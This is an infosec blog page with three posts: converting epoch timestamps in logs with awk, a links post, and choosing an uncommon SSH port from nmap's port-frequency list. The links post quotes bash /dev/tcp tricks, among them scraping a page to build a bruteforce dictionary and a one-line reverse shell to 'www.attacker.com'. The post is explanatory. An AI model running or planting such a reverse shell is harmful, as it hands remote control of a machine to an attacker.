[blog.rayfoo] Infosec, DFIR, tech geekery, thoughts and whatnot

28 May 2011

Dynamic conversion of epoch timestamps in logs

In the course of your log or text processing, you may come across timestamps in epoch format. While there are always online resources to help convert such timestamps, that is not the best approach if the timestamps are sensitive and should not be pasted into a third-party site, or if you have thousands or millions of them to convert.

While there are free tools like Splunk available to the masses (and yes, it does automatically convert epoch timestamps for you), there's always our "humble" awk. :D
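As an added example (not from the original post), here is one way to do that conversion with awk alone. It deliberately avoids gawk's strftime() and GNU date so it works on any POSIX awk, offline, with nothing leaving the box: the civil-date calculation is done with integer arithmetic inside the awk program. The function name epoch_to_utc and the field-number argument are this example's own choices; the treatment of 13-digit values as milliseconds is an assumption about typical JSON/Java logs.

```shell
# Added example: convert epoch-second timestamps in a log stream to UTC
# "YYYY-MM-DD HH:MM:SS" using only POSIX awk (no gawk strftime, no GNU date).
#
# Usage: epoch_to_utc [FIELD] < logfile    (FIELD defaults to 1)
epoch_to_utc() {
  awk -v col="${1:-1}" '
  # Days since 1970-01-01 -> "YYYY-MM-DD" (proleptic Gregorian calendar).
  # Integer-only arithmetic, so the result is exact in any awk.
  function civil(days,    z, era, doe, yoe, y, doy, mp, d, m) {
    z = days + 719468
    if (z >= 0) era = int(z / 146097); else era = int((z - 146096) / 146097)
    doe = z - era * 146097
    yoe = int((doe - int(doe / 1460) + int(doe / 36524) - int(doe / 146096)) / 365)
    y = yoe + era * 400
    doy = doe - (365 * yoe + int(yoe / 4) - int(yoe / 100))
    mp = int((5 * doy + 2) / 153)
    d = doy - int((153 * mp + 2) / 5) + 1
    if (mp < 10) m = mp + 3; else m = mp - 9
    if (m <= 2) y++
    return sprintf("%04d-%02d-%02d", y, m, d)
  }
  # Epoch seconds -> "YYYY-MM-DD HH:MM:SS" in UTC. Values of 13+ digits are
  # assumed (for this example) to be milliseconds and are truncated to seconds;
  # fractional seconds are dropped.
  function fmt(ts,    days, secs) {
    if (ts >= 100000000000) ts = int(ts / 1000)
    days = int(ts / 86400)
    secs = ts - days * 86400
    return civil(days) sprintf(" %02d:%02d:%02d",
                               int(secs / 3600), int((secs % 3600) / 60), secs % 60)
  }
  # Only rewrite the chosen field when it is purely numeric; anything else
  # (already-formatted dates, hostnames, PIDs in other columns) passes through.
  $col ~ /^[0-9]+(\.[0-9]+)?$/ { $col = fmt($col) }
  { print }'
}
```

Pipe a log into it, e.g. `epoch_to_utc 2 < auth.log` rewrites the second whitespace-separated field of every line; lines whose field is not a plain number are printed unchanged, so mixed files are safe to feed through.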

17 May 2011

Interesting Links

I will start linking some of the stuff that could be interesting and useful here. Let's start off with an alternative BASH-fu technique to initiate and listen for TCP connections from a (supposedly pwned) Linux box:

http://blog.rootshell.be/2011/05/05/binbash-phone-home/

Now the question arises: when could those network redirections be helpful? First, bash can be used without third-party tools to grab data from the network. The example below fetches this blog's main page:

  exec 5<> /dev/tcp/blog.rootshell.be/80
  printf "GET / HTTP/1.0\n\n" >&5
  cat <&5
  exec 5>&-

Very convenient if you don’t have link or curl installed. Just pipe the output to other commands. This can be used to generate dictionary files to conduct a bruteforce attack:

  exec 5<> /dev/tcp/blog.rootshell.be/80
  printf "GET / HTTP/1.0\n\n" >&5
  cat <&5 > foo.tmp
  exec 5>&-
  sed -e 's/<[!a-zA-Z/][^>]*>//g' foo.tmp | tr " " "\n"

Another nice example is to make bash “phone home”. Let’s launch a reverse shell to an attacker box:

  victim# bash 0</dev/tcp/www.attacker.com/8888 1>&0 2>&0

As the bash shell is very common, it can be very interesting! Just use your imagination to find other examples. A final remark: this feature is not available on all pre-compiled or packaged bash instances! Some UNIX flavors consider it as dangerous (which is true!). If you want to compile your own bash with this feature enabled, the configuration flag is “--enable-net-redirections“.

Also, a tool to help with PDF creation/modification/analysis.  Sounds promising:

http://code.google.com/p/peepdf/

peepdf is a Python tool to explore PDF files in order to find out if the file can be harmful or not. The aim of this tool is to provide all the necessary components that a security researcher could need in a PDF analysis without using 3 or 4 tools to make all the tasks. With peepdf it's possible to see all the objects in the document, showing the suspicious elements; it supports all the most used filters and encodings, and it can parse different versions of a file, object streams and encrypted files. With the installation of Spidermonkey and Libemu it provides Javascript and shellcode analysis wrappers too. Apart from this it's able to create new PDF files and to modify existing ones.

26 Mar 2011

Added Layer Of Obscurity: Finding a non-standard port for your service

Designing your security model using only obscurity is always a bad idea, but once sound measures are in place, an added layer of obscurity might make the service/account harder for malicious actors to find, and reduce the resources wasted by their brute forcing, etc.

An example would be the changing of private services (e.g. SSH) to run on non-standard ports (I see this frequently recommended as part of hardening guides anyway; there's port knocking too which could be even better, but that's not the point of this post).

In the example of hiding SSH ports, the question then comes: which port to use? One of many ways is to use nmap's frequently-used ports list to help make a decision. In a normal scan, nmap probes the top 1000 most frequently used ports (although the scan can be changed to use any top n ports instead). So we run this in a shell to list the top 1000 (or n of your fancy) used ports:

cat /usr/share/nmap/nmap-services | \
awk '{print $3 "\t" $2 "\t\t" $1}' | \
sort -nr | head -n1000 | less

Let's break this command down:

cat /usr/share/nmap/nmap-services prints the contents of the nmap-services file (which records, for each port, how frequently it was found open, and is used to rank ports) to STDOUT.

awk '{print $3 "\t" $2 "\t\t" $1}' reorders each line of nmap-services (frequency, then port/protocol, then service name) so that the sort command can work on the frequency column.

sort -nr sorts the entries in descending numerical order, most frequently used ports first.

head -n1000 shows only the top 1000 lines of output (change to any number you wish, or remove altogether to see the full list).

less displays the output in a scrollable, searchable manner.

On an ending note, it would probably be a bad idea to go straight for the last entries in the sorted list for your port selection. Remember: we want to be unpredictable, not simply different.
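As an added example that is not part of the original post, the script below packages the idea of this post: it parses the nmap-services format the same way the pipeline above does (skipping comment lines and udp entries so they cannot pollute the ranking), lists the top-N tcp ports, and then draws a random port from /dev/urandom that is not among them, so the choice is unpredictable rather than merely "the least common port in the file". The sample data is a constructed excerpt in nmap-services format, not the real file; the function names, the 1024-32767 range (chosen to stay below the Linux default ephemeral range) and the optional exclusion list are this example's own assumptions.

```shell
# Added example: rank nmap-services entries as the post's pipeline does, then
# pick a random port that is NOT among the top-N most frequently open ports.
#
# Constructed excerpt in nmap-services format: "name  port/proto  open-frequency  # comment".
NMAP_SERVICES_SAMPLE='# Constructed excerpt in nmap-services format (not the real file)
http           80/tcp    0.484143  # World Wide Web HTTP
telnet         23/tcp    0.221265
https          443/tcp   0.208669  # secure http (SSL)
domain         53/udp    0.213496  # Domain Name Server
ssh            22/tcp    0.182286  # Secure Shell Login
smtp           25/tcp    0.131314  # Simple Mail Transfer
ms-wbt-server  3389/tcp  0.083904  # Microsoft Remote Display Protocol'

# Top N tcp ports by open-frequency, one port number per line.
# $1 = N; nmap-services content on stdin. Comment lines and udp entries are
# dropped before sorting, which the bare "cat | awk" pipeline does not do.
top_tcp_ports() {
  awk '$1 !~ /^#/ && $2 ~ /\/tcp$/ { split($2, p, "/"); print $3 "\t" p[1] }' \
    | sort -nr | head -n "$1" | cut -f2
}

# Random port in 1024-32767 (assumed here to sit below the Linux default
# ephemeral range) that is neither in the top-N list nor in the optional
# space-separated exclusion list in $2 (ports you already run something on).
# /dev/urandom is the entropy source: "unpredictable, not simply different".
pick_obscure_port() {
  top=$(top_tcp_ports "$1")
  while :; do
    r=$(od -An -N2 -tu2 /dev/urandom | tr -d ' ')
    port=$((1024 + r % 31744))
    if ! printf '%s\n' $top $2 | grep -qx "$port"; then
      echo "$port"
      return 0
    fi
  done
}
```

On a real host you would feed the actual file, e.g. `pick_obscure_port 1000 "8080 2222" < /usr/share/nmap/nmap-services`, and then confirm the result is free with your usual listener check before changing the sshd Port directive.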